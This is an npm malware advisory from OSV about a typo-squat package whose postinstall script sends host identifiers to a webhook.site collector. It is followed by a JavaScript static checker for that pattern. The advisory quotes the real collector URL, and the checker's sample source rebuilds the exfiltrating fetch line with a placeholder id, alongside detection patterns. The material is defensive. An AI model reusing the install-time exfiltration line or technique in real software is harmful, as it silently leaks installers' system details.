npm

getd-eslint-rules@0.0.1

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID: MAL-2026-5466

Ecosystem: npm

Summary

On npm install, postinstall.js collects host identifiers (os.hostname, the os.userInfo username, os.platform, the current working directory, the CI environment variable, and the package name/version) and sends them as query-string parameters in an HTTPS GET to a hardcoded webhook.site collector URL (postinstall.js line 18: https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5?pkg=...&host=...&user=...&platform=...&cwd=...&ci=...). The fetch fires automatically on install, and errors are silently swallowed. The package describes itself as a 'defensive typo-squat' research artifact, but installer-side identifiers are exfiltrated to a third-party request collector without consent regardless of stated intent. The package name pattern targets users who mistype the name of an ESLint rules package, increasing the chance of unintended installation.

Source: amazon-inspector (17328047b2ec8dce82cfbdfd5b16c8f862d51dca26b02c9801587c220a48975a)
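
A static check for the pattern this report describes, as an added example that is not part of the report or the package: it inspects install-time lifecycle scripts for host-identifier collection combined with a hardcoded outbound URL. The function names, the readSource callback, and the sample manifest and source (with a placeholder collector id) are assumptions constructed for illustration.

```javascript
// Added example: static triage of npm install-time scripts (not code from the package).
const LIFECYCLE = ['preinstall', 'install', 'postinstall'];
// Host identifiers named in the report summary.
const IDENTIFIER_PATTERNS = {
  hostname: /\bos\.hostname\s*\(/,
  username: /\bos\.userInfo\s*\(/,
  platform: /\bos\.platform\s*\(/,
  cwd: /\bprocess\.cwd\s*\(/,
  ci: /\bprocess\.env\.CI\b/,
};
const URL_RE = /https?:\/\/[^\s'"`?]+/g;
// Empty promise .catch handler or empty catch block: failures leave no trace for the installer.
const SWALLOW_RE = /\.catch\s*\(\s*\(\s*\)\s*=>\s*\{\s*\}\s*\)|catch\s*(\([^)]*\))?\s*\{\s*\}/;

function hostOf(u) { try { return new URL(u).hostname; } catch { return null; } }

// manifest: parsed package.json. readSource(relPath): file text, or null if absent
// (hypothetical callback; back it with reads from an unpacked tarball, never an installed copy).
function auditInstallScripts(manifest, readSource) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    // Only the "node <file>" form is followed; anything else is reported as unresolved.
    const m = /^\s*node\s+(\S+)/.exec(cmd);
    const src = m ? readSource(m[1]) : null;
    if (src == null) { findings.push({ hook, cmd, resolved: false }); continue; }
    const identifiers = Object.keys(IDENTIFIER_PATTERNS).filter(k => IDENTIFIER_PATTERNS[k].test(src));
    const hosts = [...new Set((src.match(URL_RE) || []).map(hostOf).filter(Boolean))];
    findings.push({
      hook, cmd, resolved: true, file: m[1], identifiers, hosts,
      swallowsErrors: SWALLOW_RE.test(src),
      // Identifier collection plus a hardcoded endpoint is the pattern in the summary.
      suspicious: identifiers.length > 0 && hosts.length > 0,
    });
  }
  return findings;
}

// Constructed sample mirroring the described behaviour; it is only scanned as text, never run.
const SAMPLE_MANIFEST = { name: 'sample-pkg', version: '0.0.1', scripts: { postinstall: 'node postinstall.js' } };
const SAMPLE_SOURCE = [
  "const os = require('os');",
  "const q = new URLSearchParams({ host: os.hostname(), user: os.userInfo().username,",
  "  platform: os.platform(), cwd: process.cwd(), ci: process.env.CI || '' });",
  "fetch('https://webhook.site/00000000-0000-0000-0000-000000000000?' + q).catch(() => {});",
].join('\n');
const readSample = name => (name === 'postinstall.js' ? SAMPLE_SOURCE : null);
console.log(JSON.stringify(auditInstallScripts(SAMPLE_MANIFEST, readSample), null, 2));
```

Unresolved hooks (shell commands, inline node -e) still need manual review, and installing with npm install --ignore-scripts keeps lifecycle scripts from running while a package is being inspected.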
